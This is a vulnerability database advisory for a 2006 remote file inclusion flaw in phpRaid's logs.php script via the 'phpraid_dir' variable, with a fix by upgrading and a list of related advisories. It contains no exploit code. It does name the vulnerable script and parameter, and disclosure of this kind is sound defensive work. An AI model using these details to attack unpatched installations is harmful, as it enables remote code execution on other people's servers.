phpRaid logs.php phpraid_dir Variable Remote File Inclusion

2006-06-29T06:34:08
ID OSVDB:26903
Type osvdb
Reporter Sven Krewitt(remove-vuln@secunia.com)
Modified 2006-06-29T06:34:08

Description

Vulnerability Description

phpRaid contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the logs.php script not properly sanitizing user input supplied to the 'phpraid_dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Upgrade to version 3.0.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

phpRaid contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the logs.php script not properly sanitizing user input supplied to the 'phpraid_dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

References:

Vendor URL: http://www.spiffyjr.com/ Secunia Advisory ID:20200 Related OSVDB ID: 26886 Related OSVDB ID: 26901 Related OSVDB ID: 26887 Related OSVDB ID: 26888 Related OSVDB ID: 26893 Related OSVDB ID: 26894 Related OSVDB ID: 26899 Related OSVDB ID: 26902 Related OSVDB ID: 26904 Related OSVDB ID: 26891 Related OSVDB ID: 26895 Related OSVDB ID: 26896 Related OSVDB ID: 26897 Related OSVDB ID: 26898 Related OSVDB ID: 26900 Related OSVDB ID: 26890 Related OSVDB ID: 26892 Other Advisory URL: http://secunia.com/secunia_research/2006-47/advisory/ Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-06/0824.html CVE-2006-3316